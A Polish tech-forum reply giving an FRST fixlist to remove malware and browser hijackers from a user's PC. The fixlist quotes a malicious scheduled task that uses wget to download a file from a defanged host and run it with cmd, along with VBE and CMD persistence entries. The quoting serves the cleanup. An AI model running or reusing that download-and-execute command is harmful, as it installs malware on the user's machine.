Elektroda.pl
Elektroda.pl
X
Proszę, dodaj wyjątek www.elektroda.pl do Adblock.
Dzięki temu, że oglądasz reklamy, wspierasz portal i użytkowników.

Uciążliwy javaws.exe - prośba o sprawdzenie logów.

resoto 14 Wrz 2016 19:51 423 1
  • #2 15 Wrz 2016 07:33
    krzychupar
    Poziom 40  

    Otwórz notatnik systemowy i wklej:
    Task: {4972E24F-94AA-44B9-863D-11A4B8E3C10D} - System32\Tasks\SYSTEM => /R cd "C:\ProgramData" &amp; ping 1.1.1.1 -n 300 -w 1000 &amp; wget -t 0 --retry-connrefused -O dat.bmp hxxp://blockchainin.in/dat.bmp?data=yHXMwObQv9I3uyYpTIFK;Minecraft;1462184525 &amp; start cmd /R dat.bmp <==== UWAGA
    Task: {914D83CE-CB22-4485-84BA-D24FD462B5DF} - System32\Tasks\Origin => C:\Users\Kamil\AppData\Roaming\Origin\update.vbe [2015-04-02] () <==== UWAGA
    Task: {91636D77-D61E-4476-A73D-9CF33EA7BC5D} - System32\Tasks\{EEE3A717-0A37-4675-B09B-9368A9D65E2B} => pcalua.exe -a "C:\Games\The Sims 4\__Installer\vp6\vp6install.exe" -d "C:\Games\The Sims 4\__Installer\vp6"
    HKU\S-1-5-21-1708202100-893893852-4168873351-1000\...\CurrentVersion\Windows: [Load] C:\Users\Kamil\LOCALS~1\Temp\msztot.cmd <===== UWAGA
    HKU\S-1-5-21-1708202100-893893852-4168873351-1000\...\MountPoints2: D - D:\autorun.exe
    HKU\S-1-5-21-1708202100-893893852-4168873351-1000\...\MountPoints2: F - F:\setup.exe
    ShellIconOverlayIdentifiers: [###MegaShellExtPending] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => C:\Users\Kamil\AppData\Local\MEGAsync\ShellExtX64.dll Brak pliku
    ShellIconOverlayIdentifiers: [###MegaShellExtSynced] -> {05B38830-F4E9-4329-978B-1DD28605D202} => C:\Users\Kamil\AppData\Local\MEGAsync\ShellExtX64.dll Brak pliku
    ShellIconOverlayIdentifiers: [###MegaShellExtSyncing] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => C:\Users\Kamil\AppData\Local\MEGAsync\ShellExtX64.dll Brak pliku
    ShellIconOverlayIdentifiers-x32: [ SkyDrivePro1 (ErrorConflict)] -> {8BA85C75-763B-4103-94EB-9470F12FE0F7} => Brak pliku
    ShellIconOverlayIdentifiers-x32: [ SkyDrivePro2 (SyncInProgress)] -> {CD55129A-B1A1-438E-A425-CEBC7DC684EE} => Brak pliku
    ShellIconOverlayIdentifiers-x32: [ SkyDrivePro3 (InSync)] -> {E768CD3B-BDDC-436D-9C13-E1B39CA257B1} => Brak pliku
    ShellIconOverlayIdentifiers-x32: [###MegaShellExtPending] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => C:\Users\Kamil\AppData\Local\MEGAsync\ShellExtX32.dll Brak pliku
    ShellIconOverlayIdentifiers-x32: [###MegaShellExtSynced] -> {05B38830-F4E9-4329-978B-1DD28605D202} => C:\Users\Kamil\AppData\Local\MEGAsync\ShellExtX32.dll Brak pliku
    ShellIconOverlayIdentifiers-x32: [###MegaShellExtSyncing] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => C:\Users\Kamil\AppData\Local\MEGAsync\ShellExtX32.dll Brak pliku
    StartMenuInternet: IEXPLORE.EXE - C:\Program Files (x86)\Internet Explorer\iexplore.exe hxxp://www.istartsurf.com/?type=sc&ts=144...p;uid=ST1000DM003-1CH162_Z1DB9H9CXXXXZ1DB9H9C




    FF NewTab: hxxp://www.istartsurf.com/newtab/?type=nt&...p;uid=ST1000DM003-1CH162_Z1DB9H9CXXXXZ1DB9H9C
    FF DefaultSearchEngine: luckysearches
    FF Homepage: hxxp://www.istartsurf.com/?type=hp&ts=144...p;uid=ST1000DM003-1CH162_Z1DB9H9CXXXXZ1DB9H9C
    FF Plugin: @esn/npbattlelog,version=2.5.0 -> C:\Program Files (x86)\Battlelog Web Plugins\2.5.0\npbattlelogx64.dll [Brak pliku]
    FF Plugin-x32: @esn/npbattlelog,version=2.5.0 -> C:\Program Files (x86)\Battlelog Web Plugins\2.5.0\npbattlelog.dll [Brak pliku]
    FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files (x86)\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [Brak pliku]
    FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MIF5BA~1\Office15\NPSPWRAP.DLL [Brak pliku]
    CHR Extension: (SalePLuus) - C:\ProgramData\lcpigbgkkfkbcgihfoljdnhfmiheohib\ []
    S3 EagleX64; \??\C:\Windows\system32\drivers\EagleX64.sys [X]
    S3 MBfilt; system32\drivers\MBfilt64.sys [X]
    S3 MSICDSetup; \??\D:\CDriver64.sys [X]
    S3 WinRing0_1_2_0; \??\C:\Program Files (x86)\IObit\Game Booster 3\Driver\WinRing0x64.sys [X]
    2016-09-14 19:03 - 2016-09-14 19:08 - 00000000 ____D C:\AdwCleaner
    2015-04-15 15:32 - 2015-04-15 17:11 - 0000020 _____ () C:\Users\Kamil\AppData\Roaming\appdataFr3.bin
    2015-03-26 21:14 - 2015-03-26 21:14 - 0004185 _____ () C:\Users\Kamil\AppData\Roaming\CIJTZJ
    2015-03-26 21:14 - 2015-04-05 12:13 - 0000385 _____ () C:\Users\Kamil\AppData\Roaming\IYXBM
    2015-02-15 14:56 - 2015-04-30 18:52 - 0000937 _____ () C:\Users\Kamil\AppData\Roaming\Sample.lnk
    2014-10-20 21:13 - 2014-10-20 21:13 - 0003584 _____ () C:\Users\Kamil\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
    2016-09-11 15:54 - 2016-09-11 15:54 - 0000218 _____ () C:\Users\Kamil\AppData\Local\recently-used.xbel
    2016-07-20 22:40 - 2016-09-14 19:29 - 0007650 _____ () C:\Users\Kamil\AppData\Local\Resmon.ResmonCfg
    2016-04-18 13:33 - 2016-09-14 17:50 - 0000000 _____ () C:\ProgramData\dat.bmp
    2014-07-16 07:17 - 2014-07-16 07:17 - 0000000 ____H () C:\ProgramData\DP45977C.lfl
    2016-04-17 16:22 - 2016-05-02 12:21 - 0332800 _____ () C:\ProgramData\wget.exe
    C:\ProgramData\wget.exe
    C:\Users\Kamil\AppData\Roaming\Origin\update.vbe
    EmptyTemp:

    Plik zapisz pod nazwą fixlist.txt i umieść obok FRST w tym samym folderze.
    Uruchom FRST i kliknij w Fix/Napraw.

    0